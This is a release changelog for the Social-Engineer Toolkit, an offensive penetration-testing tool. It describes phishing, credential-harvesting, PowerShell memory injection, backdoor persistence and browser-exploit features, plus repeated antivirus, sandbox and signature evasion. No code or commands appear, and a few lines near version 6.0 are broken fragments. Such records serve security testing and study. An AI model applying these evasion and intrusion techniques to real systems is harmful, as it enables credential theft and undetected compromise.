~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added a brand new attack vector, the HTA attack, and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~
* fixed config related issue in seautomate, seupdate, and msf payload generation
* fixed an issue causing src to be undefined in infectious media generator
~~~~~~~~~~~~~~~~
version 6.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause 32-bit powershell injection to possibly not work
* fixed an issue that would cause payloads to not fire when powershell injection occurs
* restructured how bleeding edge is written initially and no longer overwrite sources.list
* removed slim_set, was used for pwnie way back and is no longer needed
* cleaned up an old mailing_list.txt format that is no longer needed
* rehauled the config directories, no longer is there a config/ directory within the SET root directory, it is now under /etc/setoolkit/set.config
* added dynamic import updates to /etc/setoolkit
* factored config changes from git pull request to fix grammar and formatting
* slimmed down powershell injection code by 32 bytes
* reworked config imports from harvester and cloner for the new config format
* rewrote portions of powershell injection to incorporate and handle reverse_http and reverse_https
* slimmed down powershell injection code more, and gave two flag variables to shave shellcode off in order to support http/https payloads
* fixed an import config error issue when using web harvester
~~~~~~~~~~~~~~~~
version 6.3.2
~~~~~~~~~~~~~~~~
* rewrote pyinjector and multipyinjector to evade sandbox technologies
* added user + kernel debugger detection and automatic termination of payloads
* bundled binaries in virtual machine containers for added detection resilience
~~~~~~~~~~~~~~~~
version 6.3.1
~~~~~~~~~~~~~~~~
* rewrote the solo payload generation into its own payload delivery that piggy backs the existing menu system
* fixed an issue when creating the payload and listener options (option 6) would specify src was not found - this was due to a code cleanup project from version 6.3
* rewrote the autorun to function accordingly with new solo
* optimized and rewrote code base for payload creation - eliminated lots of old lines of code
* rewrote autorun code and optimized to leverage solo and slimmed down code base
* fixed an issue that would cause autorun to not work when relaunching
* fixed an issue that would cause browser autopwn to use the old program_junk folder vs. /root/.set/ folder data
* added \r\n\r\n returns to all msfconsoles - people get confused without having that extra enter in place, thinking msfconsole is broken
* added \r\n\r\n to all meta_config generations when using msfconsole -r for resource files
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector do the job, standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still set to OFF (it has to be)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs can't hit it
* stabilized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldn't
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four-character alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I check for /usr/bin/msfconsole first and if it is there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
* randomized custom parameter name when deploying custom binaries to throw off static signatures
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~
* changed IP address for the payload listener to specify LHOST
* included TDS as a standard impacket library
* added port to MSSQL display when compromising system
* moved create_payloads in payloadgen to be compliant with msfvenom creation and moved off msfpayload and msfencode
* fixed multiple files still using msfpayload or msfvenom
* fixed a bug that caused a tds exceptions error when using the SQL attack (missing tds library)
* updated specific wording in setoolkit launcher
* slimmed powershell injection code to reduce injection code by about 17 bytes
* completely randomized the java applet to the point where it will randomize the name, no longer uses Signed_Update.jar - there were signatures floating around that were detecting it based on static names
* randomized and obfuscated pyinjector code base and locked into its own virtual container and debugger protection
* randomized and obfuscated multi pyinjector code base and locked into its own virtual container and debugger protection
* added the java applet to now smart detect if powershell is installed, if it is then it will not download an executable which could be used on detection capabilities. Powershell is plenty stable and should not require any deviations for a binary to be downloaded.
* added ability to check if certain paths are legitimate, if they are will deploy payloads via java applet
* full msfvenom support and conversion off msfpayload msfencode
* removed old call for impacket tds compatibility
~~~~~~~~~~~~~~~~
version 6.1.2
~~~~~~~~~~~~~~~~
* fixed powershell injection where payload would not properly generate when using pyinjector
* fixed menu option error when using multi-attack vector
~~~~~~~~~~~~~~~~
version 6.1.1
~~~~~~~~~~~~~~~~
* removed bleeding edge as a default option when launching SET - it has since been moved into config/set_config and can be turned on by switching BLEEDING_EDGE to on. Use at your own risk - it can break stuff
~~~~~~~~~~~~~~~~
version 6.1
~~~~~~~~~~~~~~~~
* fixed a bug that would throw a directory already created exception when using shellcode injection for Arduino
* fixed a bug when reverse_http/https was specified under powershell prep, it would not properly handle patching IP address or port
* fixed a bug where TDS would not be recognized as installed on updated impacket systems
* removed disable database support on psexec
~~~~~~~~~~~~~~~~
version 6.0.5
~~~~~~~~~~~~~~~~
* fixed an issue with fasttrack built-in attack with RIDENUM - would not properly close built in brute force file causing an exception
* converted powershell injection to use -win hidden instead of -win hid, for some reason some versions of Windows get mad and don't execute the code properly
* fixed powershell injection in mssql bruter
* added better upper/lower handling in options in mssql bruter
* fixed an issue causing timing issues in mssql bruter powershell injection technique
~~~~~~~~~~~~~~~~
version 6.0.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause credential harvester, tabnabbing, and webjacking to not properly redirect after successful credential nab
~~~~~~~~~~~~~~~~
version 6.0.3
~~~~~~~~~~~~~~~~
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when used on Windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
* fixed unsigned.py moving to unsigned libraries
* rehauled downloader inside java applet
~~~~~~~~~~~~~~~~
version 6.0.1
~~~~~~~~~~~~~~~~
* fixed menu system to remove sms spoofing (no longer supported)
* redesigned powershell injection to be much more efficient
* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
* added option to fall back to old method if powershell injection fails (option menu)
* start msf listener first, wait for msf to launch, then trigger vulnerability
* threaded the powershell injection command through mssql
* updated wordlist to include a couple more wordlists found in the wild
~~~~~~~~~~~~~~~~
version 6.0
~~~~~~~~~~~~~~~~
* fixed psexec which would only bring one shell back instead of as many as you used for the host
* fixed an issue that would cause metasploit payloads to not be properly generated when using msfvenom, this was due to a code change requiring -f
tags first and if not found then it injects into
tags
* added ability to render even when
flag is being used versus
* added more stability to the Java Applet.jar and backup routine for redirect to websites
* bug fix in website cloner
* rewrote portions of java applet to gain more stability around java repeater as a fallback
* added better handling around unc database and fixed a bug when in the wrong loop within cloner.py
* established a baseline fallback for java applet
* added rhino java exploit into Metasploit Browser exploits
* fixed a bug that would call wrong payloads getting confused for fileformat versus browser
* added better error handling around mssql and fasttrack
* added disabled message for web profiler for right now
* added better handling around smtp email if someone inserts something on one line and doesn't hit enter, then control-c would throw an exception
* bug fix that would not launch the linux or osx handlers for MSF
* added the option in set_config to run autorunscripts in linux meterpreter sessions separate from windows meterpreter sessions
* added post/osx/gather/enum_osx to autorun in the osx shell for better osx shell support
~~~~~~~~~~~~~~~~
version 2.4.2
~~~~~~~~~~~~~~~~
* Fixed a bug in multiattack vector where specifying java applet attack and shellcode exec would not properly inject alphanumeric shellcode into the applet
* Restructured multiattack vector to properly clone, prep payload delivery, then inject alphanumeric shellcode
* Added better handling around multiple attack vectors
* Fixed a bug that caused msfvenom to bomb out if path was /opt/framework3/msf3 versus /opt/framework/msf3
* Added better handling around multiattack
* Fixed a bug with self signed certificates that would continue to show Microsoft versus what you sign it with
* Changed java applet to load and render at bottom of body versus in head. Page should now load with Java Applet appearing
* Fixed a bug where Java Repeater would not load properly when executed due to an incorrect loop within cloner.py
* Added the ability to use filename for import versus directory
* Added the ability to import index.html files versus just the folder on the custom import feature
~~~~~~~~~~~~~~~~
version 2.4.1
~~~~~~~~~~~~~~~~
* Fixed a timing delay bug in port scanner for slow connections, would timeout and not recognize port
* Fixed a parsing error in portscanner when using single ip addresses
* Added optimization around mssql-bruter in Fast-Track
* Added new windows shell option on compromised systems as an alternative option to debug/powershell attack
* Tuned mssql bruter to work better with SQL Server 2007
* Added automatic enable of xp_cmdshell through show advanced options in the windows shell
* Added better error handling through mssql bruter forcer
* Added error handling around xp_cmdshell enablement
* Fixed a bug that would cause mssql bruter to not stop after it successfully brute forced an account
* Added better stability all around to the fast-track mssql bruter
* Bug fix on fileformat bugs that would ask for the attachment
~~~~~~~~~~~~~~~~
version 2.4
~~~~~~~~~~~~~~~~
* Rehauled the fake ap attack for menu style and stability
* Added the option for fake ap attack to use either the 10.0.0.0 or 192.168.10.0 IP range
* Added commands to properly bring up tun interface in fake ap attack
* Added variables to the dhcp3 launch command for stability
* Added some color styling to the check_length error message
* Fixed a minor code issue in stop_wifiattack.py
* Fixed a minor issue that caused the log file to error out if file was not found
* Added a description if no MSSQL servers were identified during a scan
* Fixed a bug that would brute force a null IP address
* Fixed a bug in the man left in the middle that would cause it to error out
* Bug fix for the mssql bruter / port scanner.
* Bug fix for sendmail that would cause an error message.
~~~~~~~~~~~~~~~~
version 2.3
~~~~~~~~~~~~~~~~
* fixed a bug that would not load the menus properly when loading SET (bad return placement)
* fixed an annoying bug that has been around for a number of versions, finally tracked down. On some occasions where it would show "Moving payload to website", you couldn't control-c out to exit and would have to close the console window. This has been resolved.
* rewrote shellcodeexec again to evade AV
* added the shellcodeexec.c modified source code
* removed improper way to mask error messages through 1> /dev/null and 2> /dev/null, pipe information through subprocess.PIPE instead
* fixed a bug in fast-track with the mssql bruter where if using the SET interactive shell, it wouldn't spawn the HTTP server properly due to site.template and attack.vector files not being found. Added better granularity on detecting files and setting defaults if they are not found
* adjusted the repeater time to 2 seconds versus 3
* added additional passwords found in pentests to the wordlist
* removed excess code from setcore
* moved Signed_Update.jar that is generated through Java Applet attack, it now goes through src/program_junk versus src/html
* rewrote large portions of SET to place cloned websites and files under src/program_junk/web_clone versus src/webattack/web_clone/site/template
* added new config option for OSX/LINUX payload ports and removed the automatic prompt after generating metasploit payload if you want to target OSX/Linux. It will automatically target Linux/OSX and removes another prompt in setting everything up
* added additional stability to powershell injection, it is now enabled by default. If powershell is injected, it will send a payload straight through memory versus touching disk. Note that you may get two shells back. This is intentional as it's a failsafe if the one method fails through powershell. So regardless, if the powershell injection fails to compromise, the backup dropper will still execute
* bug fix in mssql.py where it would throw an error about not finding the proper payload in the fasttrack mssql bruter
~~~~~~~~~~~~~~~~
version 2.2.2
~~~~~~~~~~~~~~~~
* Added significant stability to the java applet which caused a repeating loop of the java applet
* Added significant stability around the java applet when powershell might be active but still did not trigger, it will fall back into another applet
* Added better performance and cleaned up code around Java Applet
* Recompiled shellcodeexec to evade AV
* Turned auto_migrate to optional versus automatic, can be buggy sometimes
* Added the ability to see actual brute force attempts on SQL servers and notify you when you were unable to brute force a SQL server
* Added better detection around finding msfvenom for powershell injection in case it was not in normal path routines
* Removed black box when executing powershell - shellcode through the teensy device
* Cross compiled the binary to be compliant for x86 based systems with shellcodeexec, the latest version didn't use MT and used MD when compiling
* added p.stream handling to remove hangs when using the java applet stream for powershell injection (thanks leg3nd)
~~~~~~~~~~~~~~~~
version 2.2.1
~~~~~~~~~~~~~~~~
* Added stability to the powershell attack through the java applet
* If powershell injection is enabled and SETSHELL/RATTE is chosen, it will disable it automatically as the two are not compatible
* Added a new config option to use verbose on the powershell injection, it will show you the encoded command that will be used on the victim machine
* Got a patch from Dale Lakes on check_mssql, does smart detection on yum/apt for automatic installation
~~~~~~~~~~~~~~~~
version 2.2
~~~~~~~~~~~~~~~~
* Added better handling when generating your own legitimate certificate and ensure proper import into SET
* Adjusted java repeater time to have a little more delay, seems to be more reliable and stable if that occurs.
* Removed the check from the main launch of SET for pymssql and only added it when the fast-track menu was specified
* Removed the derbycon posting since it already happened. When we get closer I'll re-add it back in with detailed information
* Removed old files in the java applet attack that were not needed.
* Added better granularity checking the Java Applet attack when the shellcode exec or normal attacks were being specified.
* Fixed a bug that caused infectious media to bomb out if shellcodeexec was specified as a payload
* Added a legal disclaimer for first initial use of SET that it must be used for lawful purposes only and never malicious intent
* Added improved stability of the java applet attack through better payload detect/selection
* Fixed a bug with shellcodeexec and creating a payload and listener through SET, it would throw an exception, it now exports shellcodeexec properly and exports alphanumeric shellcode
* Added new config check inside core.py, will return value of config, easier. Will gradually replace all config checks with this
* Fixed an issue that would cause AUTO_REDIRECT=OFF to still continue to redirect. This was caused from a rewrite of the applet and the same parameters not being filtered properly
* Added more customizing options to RATTE. Now you can specify the custom filename RATTE uses for evading local firewalls. So you can deploy RATTE as readme.pdf.exe and it will run as iexplore.exe to bypass local firewalls. You can also specify if RATTE should be persistent or not. For testing network firewalls you won't need a persistent one. Doing a penetration test you may choose a persistent configuration.
* Fixed a bug in RATTE which could break connection to Server. RATTE now runs much more stable and can bypass high end network firewalls much more reliably.
* Added a new config option called POWERSHELL_INJECTION, this uses the technique discovered by Matthew Graeber which injects shellcode directly into memory through powershell
* Added a new teensy powershell attack leveraging the Matthew Graeber attack vector.
* Rehauled the Java Applet attack to incorporate the powershell injection technique, it's still experimental, so will remain OFF in the config by default. The applet will now detect if Powershell is installed, and if so, use the shellcode deployment method to gain memory execution without touching disk through PowerShell.
* Fixed a bug that would cause mssql bruter to error if powershell injection was enabled or other attack vectors
~~~~~~~~~~~~~~~~
version 2.1.1
~~~~~~~~~~~~~~~~
* Moved how custom templates first generated payloads then cloned. Switched in order to make sure shellcodeexec is now compatible with the custom templates
* Cleaned up code in the creation of shellcodeexec
* Fixed a sendmail issue where authentication failed wouldn't properly send the right data
* Fixed a bug where shellcodeexec would not properly execute under certain circumstances
* Added a check for sendmail, if it isn't installed it asks you to install it
~~~~~~~~~~~~~~~~
version 2.1
~~~~~~~~~~~~~~~~
* Added new menu for fasttrack integration
* Defined new folder structure for fasttrack integration
* Rehauled the initial menu to slim down and break into social-engineering attacks versus Fast-Track attacks
* Added new core module through setcore called kill_proc
* Added new core module through setcore called meta_database
* Added new autopwn functionality through fasttrack/autopwn.py, with the additions of fasttrack, the code is being completely redone, nothing will be the same
* Added a new config option called METASPLOIT_DATABASE. This will be what database type to use with metasploit, default is postgresql
* Restructured normal set to be a new main menu versus just a calling stager. set.py and fasttrack.py will be the two main files for the functionality behind SET
* Added scapy packet manipulation tool into src/core for in-depth protocol creation later on
* Added portscan.py into core, this is a fast port scanner that will be used versus leveraging third party modules
* Added new mssql module for port scanning mssql through the fasttrack menu
* Added validate IP in the portscan to check if a solo IP address is legitimate
* Added new definition scan() into the fasttrack mssql module
* Added _mssql module as a dependency and updated setup.py to include it during installation
* Added new core module check_mssql() to ensure proper import for pymssql for Fast-Track attacks
* Added new definition brute() for mssql brute forcing within fasttrack
* Added the ability to use a mssql shell for raw queries for microsoft SQL based systems
* Added the ability to do either powershell or h2b attack method via windows debug to sql bruter
* Added new function call launch_hex2binary in the mssql module in fasttrack
* Fixed a bug in the interactive shell when quitting out caused a global exception for socket(AF) versus socket.socket(AF). It no longer throws an exception
* Added all payloads from SET including interactive shell, ratte, and others into the MSSQL Bruter in Fast-Track
* Added the ability to leverage powershell to deploy in Windows 7 and Server 2008 x64 systems where debug is removed
* Added the ability to use Metasploit based payloads within the mssql bruter
* Added a background http server, nonthreaded, to keep alive when SET does the mssql bruter
* Added a new exploits section to the fast-track menu, this will be the ultimate home for custom exploits and such
* Added MS08-067 to the new exploits section in the fasttrack menu
* Added the Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) in the fasttrack exploits menu section
* Added additional spacing around the SET interactive shell to clear it up a bit when doing menu selection
* Added the ability to trigger the auto re-enable of the xp_cmdshell stored procedure if disabled
* Added the Apple QuickTime PICT PnSize Buffer Overflow from Metasploit to the Spear-Phishing attack vector
* Added the Mozilla Firefox 3.6.16 mChannel use after free vulnerability from Metasploit into the Metasploit Browser attack vector
* Added the Apple Quicktime PICT PnSize and FireFox 3.6.16 mChannel use after free to the SET-web interface
* Fixed the menu structure around the web gui to reflect the new menu change with 1 being social-engineering attacks versus all on the initial screen
* Added the latest teensy attacks into the web gui, includes gnome wget, binary 2 teensy, sdcard teensy, and X10 arduino jammers
* Added an awesome new option in the java applet attack vector, it will allow you to select shellcodeexec which means the Java applet will now deploy shellcodeexec then execute alphanumeric shellcode. Meterpreter will never touch disk!
* Rewrote the java applet quite a bit to reflect the new changes on the java applet
* Added new options in payloadgen for the java applet new menu structure for shellcodeexec
* Added reverse meterpreter, reverse https, reverse http to the shellcodeexec attack
* Fixed a bug that caused the create a fileformat payload to error out when specifying certain payloads
* Added similar format to new menu structure to the SET interactive shell
* Fixed some carriage return issues within the SET interactive shell
* Fixed a bug that caused java repeater to not work properly (thanks Kevin Mitnick for bug report)
* Added better URL handling of java repeater for post acceptance redirect
* Fixed a long standing bug that would randomly cause internet explorer to crash, had to do with java applet and waitfor() on bufferstreams
* Custom compiled shellcodeexec to not print any output and obfuscate
* Added randomized obfuscation on shellcodeexec to randomize each time it's deployed
* Fixed a bug in SET interactive shell that would randomly cause bypassuac to throw an uploads exception
* When auto-detect is turned off, it wouldn't allow you to enter a hostname, this has been fixed
* Added full path variables for when generating shellcodeexec binaries for people with strange path variables
~~~~~~~~~~~~~~~~
version 2.0.3
~~~~~~~~~~~~~~~~
* Rehauled the entire core library to be setcore which required major recoding of most modules
* Added new path variable for msf4 /opt/framework/msf3
* Added additional color schemas to core.py including background colors
* Added check_length for min/max for a payload selection in core.py
* Fixed some bugs that were causing listener to not work properly since core was not imported right
* Added color to the main setprompt, it's a dark cyan
* Fixed a socket module not callable type error in SET interactive shell listener
* Updated the svn update for Metasploit to call meta_path versus doing it through fileopen calls. Now incorporates new directory path in BT5
* Fixed the "name 'core' is not defined" bug in arp_cache.py and solo.py
* Fixed a bug in the IP validation check
* Added better error handling around the phishing attack vector within SET and GMAIL PDF illegal detection
* Fixed a bug when download + execute was specified during binary2teensy attack vector, thanks Kevin Mitnick
* Added a check to see if sendmail was installed when using spear phishing attack
* Fixed a java repeater issue due to timing issues
~~~~~~~~~~~~~~~~
version 2.0.2
~~~~~~~~~~~~~~~~
* Fixed a bug where you couldn't go back into mass mailer attack if it was previously used (bad import)
* Changed some flow of the smtp_client a little bit, was getting way too complex
* Fixed a bug in create a payload/listener where SET wouldn't properly pack msf.exe using UPX
* RATTEServer now uses -static compilation and works on all platforms now
* More major menu rehauling and how SET behaves during interactive mode
* Version information now pulls from core.py versus static file under src/version
~~~~~~~~~~~~~~~~
version 2.0.1
~~~~~~~~~~~~~~~~
* Added slim_set.py in config, will slim down the SET instance
* Added a new config option in set_config to turn SET_Interactive shell to off which will mean you need to spare some room in SET.
* Changing the structure of how menus look, so when you go to phishing, you know you're in the phishing menu, when you're in webattack you know you're there
* Added core function set_check to see if interactive shell is turned on or off
* Added new core function to standardize menu output for option 99
* Added a 99 backout menu to the infectious media menu
* Fixed a bug that would cause updating SET or Metasploit to throw an exception. Changed to call core.update_set() versus update_set()
* Updated set_config with instructions to install Sendmail as it is not included by default in Backtrack5
* Fixed a bug in Binary2Teensy that would improperly call the Teensy payload menu
* Fixed a couple bugs in smtp_client and added new menu mode into mass mailer
~~~~~~~~~~~~~~~~
version 2.0
~~~~~~~~~~~~~~~~
* Removed un-needed assignment in core around create random string
* Added the Binary2Teensy option in the Teensy menu, this will allow you to create a payload and inject alphanumeric shellcode through shellcodeexec in a new technique released at BSIDESLV
* Changed the path of metasploit to be /opt/msf3/framework3 versus /pentest/exploits/framework3
* Added the ability for multiple payloads in binary2teensy attack
* Added the ability to leverage the SDCard mounted Teensy device with payload generation without mounting the SDCard to the victim machine
* Fixed a bug where webattack_email turned on would not trigger based on a wrong path
* Updated the phishing attacks in the infectious media site and phishing site in the web GUI interface
* Updated the Wireless Access Point Attack to choose the monitor interface that is most recently created
* Changed the menu output, this is the first of many changes on how the menu interacts
* Added an X10 Sniffer into the Arduino based attack vectors
* Added an X10 Jammer into the Arduino based attack vectors
* Changed the menu option to reflect Arduino based attack vector versus Teensy
* Added a starttls check for authentication around sendmail
* Fixed a bug in mass mailer that would cause gmail to be set versus smtp relay
* Added the SD2Teensy OSX attack vector which targets OSX machines by dumping from the converts.txt storage drive on the teensy
* Added additional exploits into client-side attacks for the browser exploits
* Added additional exploits into the spear-phishing attacks
* Fixed a bug where SET would not properly check for running Apache servers and stale SET processes
~~~~~~~~~~~~~~~~
version 1.5.3
~~~~~~~~~~~~~~~~
* Large menu rehaul and things moved to different places and code cleaned up
* Fixed the logging problem that would not generate log messages for errors in src/logs/
* Added print_status, print_error, and print_input in the core modules, all menus should now use this from now on
* Added some alignment to some menus and made it flow better
* Replaced linux reverse tcp shell with reverse meterpreter in the java applet attack vector (thanks dmdxs1)
* Changed the web_port config to work in spawn.py which houses a lot of the web servers / listeners
~~~~~~~~~~~~~~~~
version 1.5.2
~~~~~~~~~~~~~~~~
* Fixed a bug that would trigger an invalid shell if a connection was received in the SET interactive shell (thanks Paul Hallstein)
* Changed interactive shell listener to not flag on invalid choice if return was hit versus an actual invalid option
* Added the ability to see multiple shells coming in when in the selection menu, before you had to interact with a shell to see the other connections
* Rewrote portions of the java applet to reflect sun java instead of microsoft as well as fix some bugs with the multi-platform shells
* Added better handling around chmod for OSX/Linux detection in Java Applet
* Cleaned up some code within the Java Applet
* Added better connection handling and detection including threaded menu mode
* Fixed a bug within the smtp mailer when webattack would be set to ON, it would throw an error, this has been resolved
* Starting to work on a better downloader for the SET interactive shell. Goal is to have it leverage WriteProcessMemory and allocate enough space for the SET interactive shell to place into an existing process like explorer.exe, etc.
* Removed custom packing of SET interactive shell, putting custom-UPX on top of PE sometimes causes corruption for some reason
* Fixed an issue with MLITM that was trying to import the wrong module and throw an exception
* Moved verbose text from modules into text.py file
* Now drawing most of the menus dynamically
* Fixed a bug where spear-phishing would not properly send an email leveraging GMAIL (thanks Karthik!)
* Fixed another bug that was affecting sendmail via spear-phishing
* Fixed an issue where RATTE payloads would show up as 2 and 3 and be missing menu number one (thanks Christian Gelici)
* Fixed an issue with payloadgen that caused msf.exe to not properly be created due to a variable messup (thanks f3bruary)
* Fixed an issue where client-side exploits were not properly getting created (thanks f3bruary)
* Fixed a bug where the dll hijacking would not properly execute
* Standardized all menu returns/exits to the same number - 99
* Fixed a bug that caused file imports to fail, thanks Lampis Alevizos!
~~~~~~~~~~~~~~~~
version 1.5.1
~~~~~~~~~~~~~~~~
* Changed the order of ietabs exploit and aurora to be consistent
* Complete rehaul of the directory structure, more to come.
* A large restructuring has occurred that maps all the folders to actual attacks. Still a work in progress
* Added automatic import for jar_file.py that dynamically imports new Java.java files into the Java Applet if you want to make changes to the code
~~~~~~~~~~~~~~~~
version 1.5
~~~~~~~~~~~~~~~~
* Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository
* Added shell to support Linux/OSX for SET Interactive Shell
* Added download to support Linux/OSX for SET Interactive Shell
* Added upload to support Linux/OSX for SET Interactive Shell
* Added ps to support Linux/OSX for SET Interactive Shell
* Added kill to support Linux/OSX for SET Interactive Shell
* Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me
* Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell
* Added better integer handling when running listener.py by itself without specifying a port
* Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary)
* Added separate installers for shell.linux and shell.osx, too many differences between the two and needed different compiling.
* Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx
* Added reboot now into the SET interactive Shell
* Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes
* Added name distinguishing per windows/posix systems so it will show up :POSIX :WINDOWS on interactive shell, will also show :WINDOWS:UAC-SAFE and :WINDOWS:SYSTEM.
* Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit
* Added dynamic packing to download/upload for persistence, better AV avoidance
* Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui
* Added 'clear' and 'cls' in the SET Interactive Menu to remove what's on the screen, etc.
* When using the java docbase exploit, removed 'Client Login' for title frame, isn't needed
* Added back command to the SET interactive shell to go back when in different menus
* Fixed a bug where it would state payloadprep not defined, it was caused by UPX not fully packing the device at time of upload, a 3 second delay has been added
* Fixed a bug where creating a RATTE payload in option 4 would launch the SET interactive shell by mistake versus the RATTE listener.
Thanks darkther4py * Fixed a bug where mass mailer would throw an indentation exceptions ~~~~~~~~~~~~~~~~ version 1.4.2 ~~~~~~~~~~~~~~~~ * Fixed the path to UPX in Back|Track 5 if installed to /usr/bin/upx * Added the latest Cisco AnyConnect download and execute exploit from Metasploit * Added a message prompt if Apache is not detected being running. If it isn't it will now ask if you want to start it (thanks ChrisJohnRiley) * Added auto migration into the Metasploit Client-Side attacks, previously it was only for Java Applet (thanks ChrisJohnRiley) * Changed the iframe width and height to be 100/100 to have better clips on Adobe PDF exploits (thanks ChrisJohnRiley) * Changed dnsspoof path to be reflective of Back|Track 5 * Added support for Yahoo and Hotmail, you can now configure it in the set_config file at the very bottom as EMAIL_PROVIDER * Changed the location of airbase-ng to be Back|Track 5 compliant * Fixed a child exception error when using the mass mailer and not selecting the listener * Handled mkdir commands better if directory was already there * Added multi-threaded support to the spear-phishing attack vector when sending emails out * Fixed a bug that caused the report generator in credential harvester to fail and not report findings accurately * Fixed a bug where visit statistics were not properly showing up in the exported report * Fixed a bug where using webjacking would not load index2.html properly when site had been jacked due to new logging added in the report_harvester and do_GET() handlers * Fixed a bug where using webjacking and java applet attack would not load java applet because of the new do_GET() handler, it now loads properly * Fixed a bug in mass mailer using sendmail, incorrect indentation * Added AP_CHANNEL to set_config to allow configuration of channels for airbase-ng, it wouldn't recognize as a valid AP without properly specifiying the channel (thanks pr1me and rejectedmaniac) * Fixed a bug where the sms templates were not 
properly loading filename extensions since moving the original templates directory (thanks dmdxs) * Fixed a bug when you selected web templates in Java Applet and you hit run it would try to redirect back to the local machine and continue to prompt for java applet even after execution. It now redirects back to the proper web template site * Fixed a literal 10 error message when using the SET interactive shell if you specified 'quit' before entering the interactive shell * Changed python path to /usr/bin/env python instead of /usr/local/bin/python since it doesn't work on OSX however /usr/bin/env python does ~~~~~~~~~~~~~~~~ version 1.4.1 ~~~~~~~~~~~~~~~~ * Fixed a bug where the SET web port would not configure properly if a different port was specified. Accidently put the check in the do_g$ * Re-enabled the SET interactive shell UPX polymorphic encoder addition, was buggy before seems to be find now * Added the source code for the bypassuac exploit under the set_payloads/uac_bypass/source directory * Moved the templates directory to src/templates instead of being in the root directory, less clutty in the main root * Cleaned up some outdated code in man left in the middle attack * Added a total number of hits to successful posts/credential harvesting from the harvester attack to the html report. When you finish with the credential harvester it will let you know how many people visited the site and how many people actually fell for the attack. * Added better error handling around the SET interactive shell when selecting a number to interactive with. If a string is detected it with flag the same message as if an invalid number was specified * Fixed an issue where automigrate was still running when using the linux/osx payload option in the Java Applet attack (thanks pr1me) * Looks like python-pefile is broke on 64-bit platforms which means the digital signature stealing is out on 64-bit. 
I added a check for platform architecture, if 64bit is detected it will disable digial signature stealing. If 32 bit is detected then it will run normally. This is a temporary fix until I can look at what's flagging in python-pefile and fix. * Fixed the pefile issue, was using a newer checksum method which caused it to die in 64bit, downgraded disitools to 0.1 which uses the older method which works in 64bit, digital signature stealing should work on all platforms now * Fixed a bug where the teensy payload menu would not properly run the Gnome Teensy HID based on a wrong-placed comment (thanks to Aaron Hine) * Fixed a small bug where the email counter would not increment on mass mailer, it would say Sent e-mail: 0 and would not increase as more emails were sent. (Thanks Larry Pesce!) * Fixed a bug where selecting create a payload and listener for the SET interactive shell would flag a payloadprep not defined exceptions. (Thanks Luca Grembo) * Added some additional obfsucation on the SET interactive shell. * Updated BeautifulSoup check for 3.2.0 instead of 3.0.8.1 * Reworked core module for meta_path into calls that were leveraging static metasploit_path variables. Allows me to centralize and add checks for better msf path detection. * Fixed a bug in clientside attacks that was throwing a meta_path exceptions (thanks Pr1me) * Fixed a bug where pre-defined templates would error out based on the path move to src/templates. Thanks macfan30! ~~~~~~~~~~~~~~~~ version 1.4 ~~~~~~~~~~~~~~~~ * Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit. * Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request. 
